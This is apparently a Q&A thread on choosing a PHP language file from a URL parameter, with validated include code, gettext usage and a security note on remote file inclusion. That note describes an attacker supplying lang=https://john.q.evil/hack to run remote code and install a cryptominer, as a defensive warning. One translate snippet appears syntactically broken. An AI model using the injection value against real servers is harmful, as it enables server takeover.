I have two PHP files – en.php and fr.php. One contains variables in English the other, in French. And I have to use the needed file based on the URL. For example, if the URL ends in ?lang=en
I have to use the English one and vice versa. I am really new to PHP so that is why I’m asking here. Thanks!
Advertisement
Answer
Simple way
You keep the files in a specific directory, or strictly check the filename syntax.
This is because including the variables using require
or include
will execute a file that might be on another server, under someone else’s control (see below, ‘injection’) under the security context of your web server. You so do not want this to happen, that it isn’t funny. So: check the file name.
$lang = 'en'; if (array_key_exists('lang', $_REQUEST)) { $test = $_REQUEST['lang']; // Verify "lang" is a two-letter string if (preg_match('#^[a-z]{2}$#', $test)) { // Verify the requested language file exists if (is_readable("./{$test}.php")) { $lang = $test; } } } // Finally include the file. include_once("{$lang}.php");
Remembering last used language
session_start(); $lang = 'en'; if (array_key_exists('lang', $_REQUEST)) { ...as before... $lang = $test; $_SESSION['lang'] = $lang; } else { if (array_key_exists('lang', $_SESSION)) { $lang = $_SESSION['lang']; } } // Finally include the file. include_once("{$lang}.php");
More advanced: use a function to accept the language.
function validLanguage($test) { // Verify "lang" is a two-letter string if (preg_match('#^[a-z]{2}$#', $test)) { // Verify the requested language file exists if (is_readable("./{$test}.php")) { return $test; } } return null; }
Now read it from browser.
PHP has a function to detect what language the browser is requiring.
$languages = array(); $languages[] = 'en'; // Default, with lowest priority // Note: "en" default is not guaranteed to exist. You must ensure it does. // Browser choice, with more priority than default if (class_exists('Locale')) { $locale = Locale::acceptFromHTTP($_SERVER['HTTP_ACCEPT_LANGUAGE']); if ($locale !== null) { $test = substr($locale, 0, 2); if (null !== ($test = validLanguage($test))) { $languages[] = $test; } } } // Session, with more priority if (array_key_exists('lang', $_SESSION)) { $languages[] = $_SESSION['lang']; } // Language selected, with even more priority if (array_key_exists('lang', $_REQUEST)) { $test = $_REQUEST['lang']; if (null !== ($test = validLanguage($test))) { $languages[] = $test; } } // Pop best choice for language $lang = array_pop($languages); // Remember for the next time $_SESSION['lang'] = $lang; // Finally include the appropriate file. include_once("{$lang}.php");
Apache mod_rewrite
With more experience, you can, even afterwards, make it so requesting https://yoursite.com/en/anypage.php
will actually be equivalent to requesting the ordinary https://yoursite.com/anypage.php?lang=en
using Apache server’s mod_rewrite facility, if you have it installed and activated, achieving more user- and SEO- friendly URLs. More details in this answer.
Doing this another way: using locale()
For the reasons detailed farther below, using include
is not a very good idea after all. But usually you do this because you have something like
print "<h1>{$welcomeMessage}, {$username}!</h1>";
and you want to be able to say “Hello, John!” or “Bonjour, John!” or “Ciao, John”, depending.
In PHP you can do this in several ways. One of the more robust is through gettext
. This requires you to rewrite the above code like this – note that “_” is a valid function name! – …
print "<h1>" . _('WELCOME_MESSAGE') .", {$username}!</h1>";
and then maintain a special file called a pofile that the underscore system can use.
This has several advantages in terms of memory usage and speed, and for professional usage also, since you can send an English pofile to, say, a Russian professional translator and they will (usually) be able to use it straight away with less hassle, more easily and hence for less money, so you will be able to purchase the appropriate pofile which – once uploaded – will translate your site (or the key parts of it) to Russian. You can even let your website owner (if you’re a third-party developer) supply their own pofiles.
The job of using the gettext framework can be made less awkward with this trick: tell PHP beforehand that whatever is output must pass through a filter function.
ob_start('my_translate');
And this function will parse the argument looking for specific telltales that some text needs translating, and if so, return its translation:
function my_translate($text) { // I will translate ??CAPITAL_STRINGS_IN_DOUBLE_QUESTI1MARKS?? $telltale = '#??([A-Z][A-Z_0-9]+)??#'; return preg_replace_callback( $telltale, function ($matches) { return _($matches[1]); } $text ); }
So now your PHP code becomes
print "<h1>??WELCOME?? {$username}!</h1>";
and instead of include("{$lang}.php")
you would have a more complicated sequence, but you need it only in the one place:
// To guess actual OS, see this answer: // https://stackoverflow.com/Questions/1482260/how-to-get-the-os-on-which-php-is-running if ('Linux' === PHP_OS) { setlocale(LC_MESSAGES, $lang); } else { putenv("LC_ALL={$lang}"); } bindtextdomain('website', 'translations'); textdomain('website');
Also, you need to place the appropriate files in the “./translations” directory. In this example, $lang is a bit more complicated since it has to adhere to the “locale” syntax – so it would be “fr_FR” instead of “fr”.
Security note about PHP code injection
Imagine that your server isn’t very much hardened (many aren’t; you’d be surprised). And the name of the desired language was not checked or sanitized. And I, John Q. Evil, have reason to suspect this might be the case. Or just want to check it out. I see “lang=en”, I know what’s going on.
So I prepare a PHP script on my server and prepare it to be served without being interpreted; accessing https://john.q.evil/hack.php
will show you a PHP script complete with <?php
start tags.
Then I access your site, and specify lang=https://john.q.evil/hack
. Your web server obediently downloads and executes my code. My code, in turn, performs some diagnostics, determines that it’s running on a Whateverix 5 server on an ARM CPU as user daemon, and downloads another binary optimized for the Whateverix OS on ARM7 in unprivileged context. Then executes it with shell_exec
or in one of many other available ways. A few seconds later, your web server starts, say, mining cryptocoins to one of my disposable and deniable e-wallets.
This scenario is called a remote inclusion attack and is totally possible, and as to why should someone go to all this trouble on pretty little unknown me?, well, the answer is indeed that they wouldn’t. But that because they wouldn’t need to, not personally, not intentionally. They would instead deploy a crawler bot designed to efficiently locate all web servers that might be exploitable in such a way, and catch them all.
Why? Well, if I could infect, say, one thousand web servers, I could realistically siphon 15-20 watts of computing power from each of them without getting too much noticed. For free. At the end of a year, that should translate to around 2000 US dollars I cash having done absolutely nothing more than the initial setup. But the number of potential vulnerable websites is much more than a paltry one thousand. Attaining the 20,000 infected websites goal would begin to be a lucrative paying job (40K/yr), and tax-free to boot.
That’s why miner malware is an industry, and this is why you need to always sanitize your inputs.